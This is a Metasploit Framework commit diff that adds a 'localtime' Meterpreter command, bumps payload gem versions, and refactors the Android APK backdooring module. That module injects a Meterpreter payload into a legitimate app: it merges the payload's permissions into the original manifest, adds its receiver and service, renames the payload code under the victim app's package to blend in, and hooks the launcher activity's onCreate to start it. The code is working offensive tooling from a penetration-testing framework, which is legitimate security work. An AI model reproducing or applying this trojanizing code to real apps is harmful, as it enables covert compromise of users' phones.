Land rapid7#7423, add 'localtime' command to meterpreter and mettle

Author: Brent Cook

Gemfile.lock

@@ -14,9 +14,9 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.1.19)
+      metasploit-payloads (= 1.1.21)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.0.6)
+      metasploit_payloads-mettle (= 0.0.7)
       msgpack
       nessus_rest
       net-ssh
@@ -155,7 +155,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (2.0.3)
+    metasploit-credential (2.0.4)
       metasploit-concern
       metasploit-model
       metasploit_data_models
@@ -167,7 +167,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.1.19)
+    metasploit-payloads (1.1.21)
     metasploit_data_models (2.0.4)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -178,7 +178,7 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.0.6)
+    metasploit_payloads-mettle (0.0.7)
     method_source (0.8.2)
     mime-types (3.1)
       mime-types-data (~> 3.2015)
@@ -307,7 +307,7 @@ GEM
       simplecov-html (~> 0.10.0)
     simplecov-html (0.10.0)
     slop (3.6.0)
-    sqlite3 (1.3.11)
+    sqlite3 (1.3.12)
     sshkey (1.8.0)
     thor (0.19.1)
     thread_safe (0.3.5)

lib/msf/core/payload/apk.rb

@@ -8,14 +8,7 @@
 require 'optparse'
 require 'open3'
 
-module Msf::Payload::Apk
-
-  class ApkBackdoor
-    include Msf::Payload::Apk
-    def backdoor_apk(apk, payload)
-      backdoor_payload(apk, payload)
-    end
-  end
+class Msf::Payload::Apk
 
   def print_status(msg='')
     $stderr.puts "[*] #{msg}"
@@ -65,62 +58,45 @@ def find_launcher_activity(amanifest)
     end
   end
 
-  def fix_manifest(tempdir)
-    payload_permissions=[]
-
-    #Load payload's permissions
-    File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file|
-      k=File.read(file)
-      payload_manifest=Nokogiri::XML(k)
-      permissions = payload_manifest.xpath("//manifest/uses-permission")
-      for permission in permissions
-        name=permission.attribute("name")
-        payload_permissions << name.to_s
-      end
-    }
-
-    original_permissions=[]
-    apk_mani=""
-
-    #Load original apk's permissions
-    File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2|
-      k=File.read(file2)
-      apk_mani=k
-      original_manifest=Nokogiri::XML(k)
-      permissions = original_manifest.xpath("//manifest/uses-permission")
-      for permission in permissions
-        name=permission.attribute("name")
-        original_permissions << name.to_s
-      end
+  def parse_manifest(manifest_file)
+    File.open(manifest_file, "rb"){|file|
+      data = File.read(file)
+      return Nokogiri::XML(data)
     }
+  end
 
-    #Get permissions that are not in original APK
-    add_permissions=[]
+  def fix_manifest(tempdir)
+    #Load payload's manifest
+    payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
+    payload_permissions = payload_manifest.xpath("//manifest/uses-permission")
+
+    #Load original apk's manifest
+    original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
+    original_permissions = original_manifest.xpath("//manifest/uses-permission")
+
+    manifest = original_manifest.xpath('/manifest')
+    old_permissions = []
+    for permission in original_permissions
+      name = permission.attribute("name").to_s
+      old_permissions << name
+    end
     for permission in payload_permissions
-      if !(original_permissions.include? permission)
-        print_status("Adding #{permission}")
-        add_permissions << permission
+      name = permission.attribute("name").to_s
+      unless old_permissions.include?(name)
+        print_status("Adding #{name}")
+        original_permissions.before(permission.to_xml)
       end
     end
 
-    inject=0
-    new_mani=""
-    #Inject permissions in original APK's manifest
-    for line in apk_mani.split("\n")
-      if (line.include? "uses-permission" and inject==0)
-        for permission in add_permissions
-          new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"
-        end
-        new_mani << line+"\n"
-        inject=1
-      else
-        new_mani << line+"\n"
-      end
-    end
-    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani }
+    application = original_manifest.at_xpath('/manifest/application')
+    application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml
+    application << payload_manifest.at_xpath('/manifest/application/service').to_xml
+
+    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts original_manifest.to_xml }
   end
 
-  def backdoor_payload(apkfile, raw_payload)
+  def backdoor_apk(apkfile, raw_payload)
+
     unless apkfile && File.readable?(apkfile)
       usage
       raise RuntimeError, "Invalid template: #{apkfile}"
@@ -168,9 +144,7 @@ def backdoor_payload(apkfile, raw_payload)
     print_status "Decompiling payload APK..\n"
     run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload")
 
-    f = File.open("#{tempdir}/original/AndroidManifest.xml")
-    amanifest = Nokogiri::XML(f)
-    f.close
+    amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
 
     print_status "Locating hook point..\n"
     launcheractivity = find_launcher_activity(amanifest)
@@ -194,15 +168,33 @@ def backdoor_payload(apkfile, raw_payload)
       raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n"
     end
 
-    print_status "Copying payload files..\n"
-    FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/")
-    FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/"
+    # Remove unused files
+    FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali"
+    FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
 
-    payloadhook = entrypoint + "\n    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
+    package = amanifest.xpath("//manifest").first['package']
+    package_slash = package.gsub(/\./, "/")
+    print_status "Adding payload as package #{package}\n"
+    payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
+    payload_dir = "#{tempdir}/original/smali/#{package_slash}/"
+    FileUtils.mkdir_p payload_dir
+
+    # Copy over the payload files, fixing up the smali code
+    payload_files.each do |file_name|
+      smali = File.read(file_name)
+      newsmali = smali.gsub(/com\/metasploit\/stage/, package_slash)
+      newfilename = "#{payload_dir}#{File.basename file_name}"
+      File.open(newfilename, "wb") {|file| file.puts newsmali }
+    end
+
+    payloadhook = entrypoint + %Q^
+    invoke-static {p0}, L#{package_slash}/MainService;->startService(Landroid/content/Context;)V
+    ^
     hookedsmali = activitysmali.gsub(entrypoint, payloadhook)
 
     print_status "Loading #{smalifile} and injecting payload..\n"
     File.open(smalifile, "wb") {|file| file.puts hookedsmali }
+
     injected_apk = "#{tempdir}/output.apk"
     aligned_apk = "#{tempdir}/aligned.apk"
     print_status "Poisoning the manifest with meterpreter permissions..\n"

lib/msf/core/payload_generator.rb

@@ -320,7 +320,7 @@ def generate_payload
         gen_payload = raw_payload
       elsif payload.start_with? "android/" and not template.blank?
         cli_print "Using APK template: #{template}"
-        apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new()
+        apk_backdoor = ::Msf::Payload::Apk.new
         raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
         cli_print "Payload size: #{raw_payload.length} bytes"
         gen_payload = raw_payload

lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb

@@ -101,6 +101,15 @@ def getenv(var_name)
     value
   end
 
+  #
+  # Returns the target's local system date and time.
+  #
+  def localtime
+    request = Packet.create_request('stdapi_sys_config_localtime')
+    response = client.send_request(request)
+    (response.get_tlv_value(TLV_TYPE_LOCAL_DATETIME) || "").strip
+  end
+
   #
   # Returns a hash of information about the remote computer.
   #

lib/rex/post/meterpreter/extensions/stdapi/tlv.rb

@@ -129,6 +129,7 @@ module Stdapi
 TLV_TYPE_SID                    = TLV_META_TYPE_STRING  | 1045
 TLV_TYPE_DOMAIN                 = TLV_META_TYPE_STRING  | 1046
 TLV_TYPE_LOGGED_ON_USER_COUNT   = TLV_META_TYPE_UINT    | 1047
+TLV_TYPE_LOCAL_DATETIME         = TLV_META_TYPE_STRING  | 1048
 
 # Environment
 TLV_TYPE_ENV_VARIABLE       = TLV_META_TYPE_STRING  | 1100

lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb

@@ -94,13 +94,14 @@ def commands
       "kill"        => "Terminate a process",
       "ps"          => "List running processes",
       "reboot"      => "Reboots the remote computer",
-      "reg"	      => "Modify and interact with the remote registry",
+      "reg"         => "Modify and interact with the remote registry",
       "rev2self"    => "Calls RevertToSelf() on the remote machine",
       "shell"       => "Drop into a system command shell",
       "shutdown"    => "Shuts down the remote computer",
       "steal_token" => "Attempts to steal an impersonation token from the target process",
       "suspend"     => "Suspends or resumes a list of processes",
       "sysinfo"     => "Gets information about the remote system, such as OS",
+      "localtime"   => "Displays the target system's local date and time",
     }
     reqs = {
       "clearev"     => [ "stdapi_sys_eventlog_open", "stdapi_sys_eventlog_clear" ],
@@ -135,6 +136,7 @@ def commands
       "steal_token" => [ "stdapi_sys_config_steal_token" ],
       "suspend"     => [ "stdapi_sys_process_attach"],
       "sysinfo"     => [ "stdapi_sys_config_sysinfo" ],
+      "localtime"   => [ "stdapi_sys_config_localtime" ],
     }
 
     all.delete_if do |cmd, desc|
@@ -820,6 +822,14 @@ def cmd_sysinfo(*args)
     return true
   end
 
+  #
+  # Displays the local date and time at the remote system location.
+  #
+  def cmd_localtime(*args)
+    print_line("Local Date/Time: " + client.sys.config.localtime);
+    return true
+  end
+
   #
   # Shuts down the remote computer.
   #

metasploit-framework.gemspec

@@ -65,9 +65,9 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.1.19'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.1.21'
   # Needed for the next-generation POSIX Meterpreter
-  spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.0.6'
+  spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.0.7'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # get list of network interfaces, like eth* from OS.

modules/payloads/singles/windows/meterpreter_bind_tcp.rb

@@ -13,7 +13,7 @@
 
 module MetasploitModule
 
-  CachedSize = 957999
+  CachedSize = 983599
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

modules/payloads/singles/windows/meterpreter_reverse_http.rb

@@ -13,7 +13,7 @@
 
 module MetasploitModule
 
-  CachedSize = 959043
+  CachedSize = 984643
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

modules/payloads/singles/windows/meterpreter_reverse_https.rb

@@ -13,7 +13,7 @@
 
 module MetasploitModule
 
-  CachedSize = 959043
+  CachedSize = 984643
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows